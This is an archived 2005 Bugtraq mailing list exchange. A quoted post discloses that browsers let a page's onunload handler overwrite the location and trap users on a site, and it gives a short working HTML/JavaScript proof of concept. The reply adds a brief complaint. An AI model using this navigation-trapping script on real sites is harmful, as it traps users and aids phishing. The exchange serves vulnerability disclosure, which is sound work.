| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 24 Aug 2005 13:56:27 -0700
From: "David Gillett" <gillettdavid@...a.edu>
To: "'Tobias Boonstoppel'" <boonstoppel@...il.com>,
<bugtraq@...urityfocus.com>
Subject: RE: unload event in ie/mozilla/opera
What's worse, some browsers interpret "close the browser" to trigger
the onunload() method, and that's just wrooong.
David Gillett
> -----Original Message-----
> From: Tobias Boonstoppel [mailto:boonstoppel@...il.com]
> Sent: Tuesday, August 23, 2005 7:10 AM
> To: bugtraq@...urityfocus.com
> Subject: unload event in ie/mozilla/opera
>
>
> in nearly all browsers* you can overwrite the window location in the
> "onunload" event.
>
> that means you can "keep" the user on a site. when you type a new url
> in the address-bar, javascript overwrites it. thats a paradies for
> fishers, porn-site-hoster etc......
>
> here the html/javascript code:
>
> <html>
> <head>
> <script>
> window.unlock = false;
> window.onunload=function()
> {
> if(!window.unlock)
> window.location.href='unload.html';
> }
> document.onmousedown=function()
> {
> window.unlock = true;
> }
> </script>
> </head>
> <body>
> <a href="?link=1">Link 1</a><br>
> <a href="?link=2">Link 2</a><br>
> <a href="?link=3">Link 3</a><br>
> <a href="?link=4">Link 4</a><br>
> </body>
> </html>
>
>
> cheers
> Tobias Boonstoppel
>
>
> ps: * i testet it on firefox (linux / window) opera (linux) and
> internet explorer.
>
Powered by blists - more mailing lists